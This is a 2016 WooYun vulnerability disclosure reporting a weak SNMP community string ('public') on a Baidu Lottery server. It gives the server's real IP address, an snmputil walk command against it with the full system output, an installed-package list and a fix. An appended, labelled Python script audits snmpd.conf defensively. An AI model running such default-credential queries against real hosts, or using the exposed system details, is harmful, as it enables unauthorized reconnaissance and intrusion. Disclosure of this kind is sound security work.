A Baidu Lottery server has a weak SNMP community string

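Summary

2016-03-21: Details reported to the vendor; awaiting vendor handling
2016-03-21: Vendor has confirmed; details disclosed to the vendor only
2016-03-31: Details disclosed to core white hats and experts in related fields
2016-04-10: Details disclosed to regular white hats
2016-04-20: Details disclosed to intern white hats
2016-05-05: Details disclosed to the public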

Vulnerability overview

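Bug ID: WooYun-2016-185940

Vulnerability title: A Baidu Lottery server has a weak SNMP community string

Vendor: Baidu

Author: Yeats

Submitted: 2016-03-21 10:10

Disclosed: 2016-05-05 10:56

Vulnerability type: Weak service password

Severity: Medium

Self-assessed Rank: 5

Status: Confirmed by vendor

Vulnerability source: www.wooyun.org

Tags: weak password, sensitive information disclosure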


Vulnerability details

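Brief description:

A Baidu Lottery server has a weak SNMP community string: the remote SNMP agent accepts the community string public.

Detailed description:

A Baidu Lottery server has a weak SNMP community string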

http://211.100.44.243/

C:/Users/think/Desktop/Tools>snmputil.exe walk 211.100.44.243 public .1.3.6.1.2.1.1

Variable = system.sysDescr.0

Value = String Linux lvs101 2.6.32-431.29.2.el6.x86_64 #1 SMP Tue Sep 9 21:36:05 UTC 2014 x86_64

Variable = system.sysObjectID.0

Value = ObjectID 1.3.6.1.4.1.8072.3.2.10

Variable = system.sysUpTime.0

Value = TimeTicks 3569603946

Variable = system.sysContact.0

Value = String Root <> (configure /etc/snmp/snmp.local.conf)

Variable = system.sysName.0

Value = String lvs101

Variable = system.sysLocation.0

Value = String Unknown (edit /etc/snmp/snmpd.conf)

Variable = system.8.0

Value = TimeTicks 14

Variable = system.9.1.2.1

Value = ObjectID 1.3.6.1.6.3.11.2.3.1.1

Variable = system.9.1.2.2

Value = ObjectID 1.3.6.1.6.3.15.2.1.1

Variable = system.9.1.2.3

Value = ObjectID 1.3.6.1.6.3.10.3.1.1

Variable = system.9.1.2.4

Value = ObjectID 1.3.6.1.6.3.1

Variable = system.9.1.2.5

Value = ObjectID 1.3.6.1.2.1.49

Variable = system.9.1.2.6

Value = ObjectID 1.3.6.1.2.1.4

Variable = system.9.1.2.7

Value = ObjectID 1.3.6.1.2.1.50

Variable = system.9.1.2.8

Value = ObjectID 1.3.6.1.6.3.16.2.2.1

Variable = system.9.1.3.1

Value = String The MIB for Message Processing and Dispatching.

Variable = system.9.1.3.2

Value = String The MIB for Message Processing and Dispatching.

Variable = system.9.1.3.3

Value = String The SNMP Management Architecture MIB.

Variable = system.9.1.3.4

Value = String The MIB module for SNMPv2 entities

Variable = system.9.1.3.5

Value = String The MIB module for managing TCP implementations

Variable = system.9.1.3.6

Value = String The MIB module for managing IP and ICMP implementations

Variable = system.9.1.3.7

Value = String The MIB module for managing UDP implementations

Variable = system.9.1.3.8

Value = String View-based Access Control Model for SNMP.

Variable = system.9.1.4.1

Value = TimeTicks 14

Variable = system.9.1.4.2

Value = TimeTicks 14

Variable = system.9.1.4.3

Value = TimeTicks 14

Variable = system.9.1.4.4

Value = TimeTicks 14

Variable = system.9.1.4.5

Value = TimeTicks 14

Variable = system.9.1.4.6

Value = TimeTicks 14

Variable = system.9.1.4.7

Value = TimeTicks 14

Variable = system.9.1.4.8

Value = TimeTicks 14

End of MIB subtree.

Proof of vulnerability:

Service list:

* festival-speechtools-libs-1.2.96-18.el6

* freeipmi-1.2.1-6.el6_5

* kde-l10n-Chinese-4.3.4-5.el6

* module-init-tools-3.9-21.el6_4

* exiv2-libs-0.18.2-2.1.el6

* kdeartwork-screensavers-4.3.4-7.el6

* freeipmi-bmc-watchdog-1.2.1-6.el6_5

* mailcap-2.1.31-2.el6

* gstreamer-python-0.10.16-1.1.el6

* samba-winbind-clients-3.6.9-169.el6_5

* plymouth-scripts-0.8.3-27.el6.centos.1

* httpd-2.2.15-31.el6.centos

* geoclue-0.11.1.1-0.13.20091026git73b6729.el6

* system-config-date-1.9.60-2.el6.centos

* dbus-c++-0.5.0-0.10.20090203git13281b3.1.el6

* xorg-x11-fonts-misc-7.2-9.1.el6

* tar-1.23-11.el6

* strigi-libs-0.7.0-2.el6

* raptor-1.4.18-5.el6_2.1

* abrt-cli-2.0.8-21.el6.centos

* popt-1.13-7.el6

* mobile-broadband-provider-info-1.20100122-2.el6

* m17n-db-oriya-1.5.5-1.1.el6

* bison-2.4.1-5.el6

* plymouth-graphics-libs-0.8.3-27.el6.centos.1

* perf-2.6.32-431.29.2.el6

* libogg-1.1.4-2.1.el6

* notify-python-0.1.1-10.el6

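Fix:

Disable the default community string; turning off the service also works.

Copyright notice: when reposting, please credit the source Yeats@WooYun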
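
One way to check a host for the condition reported above, as an added example that is not part of the original report or the vendor's code: a Python audit of net-snmp `snmpd.conf` text that flags default community strings and unrestricted sources. The `WEAK` list, the function name `audit` and the sample configuration are assumptions constructed for illustration.

```python
import shlex

# Assumed list of guessable default community strings; extend for local policy.
WEAK = {"public", "private"}
DIRECT = {"rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6"}
MAPPED = {"com2sec", "com2sec6"}
OPEN_SOURCES = {"default", "0.0.0.0/0", "::/0"}
# Constructed sample config, not taken from the reported host.
SAMPLE = """\
rocommunity public  # left at default
com2sec notConfigUser default public
rocommunity s3cr3t-Xq9 10.0.0.5
rwcommunity private 10.0.0.0/8
"""

def audit(conf_text):
    """Return (line_no, directive, issue) findings for snmpd.conf text."""
    findings = []
    for no, raw in enumerate(conf_text.splitlines(), 1):
        try:
            tok = shlex.split(raw, comments=True)  # drops '#' comments
        except ValueError:  # unbalanced quote: skip the malformed line
            continue
        if not tok:
            continue
        name, args = tok[0].lower(), tok[1:]
        if name in DIRECT and args:
            # rocommunity COMMUNITY [SOURCE ...]; no SOURCE means any address
            community = args[0]
            source = args[1] if len(args) > 1 else "default"
        elif name in MAPPED:
            # com2sec [-Cn CONTEXT] SECNAME SOURCE COMMUNITY
            if args[:1] == ["-Cn"]:
                args = args[2:]
            if len(args) < 3:
                continue
            source, community = args[1], args[2]
        else:
            continue
        if community.lower() in WEAK:
            findings.append((no, name, "default community string"))
        if source in OPEN_SOURCES:
            findings.append((no, name, "any source address allowed"))
        if name.startswith("rw"):
            findings.append((no, name, "write access via community string"))
    return findings

if __name__ == "__main__":
    print(*audit(SAMPLE), sep="\n")
```

Feed it the contents of `/etc/snmp/snmpd.conf`; an empty result means no community-based access line matched these checks.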


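Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmation time: 2016-03-21 10:56

Vendor reply:

Thank you for your attention to Baidu security

Latest status:

None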

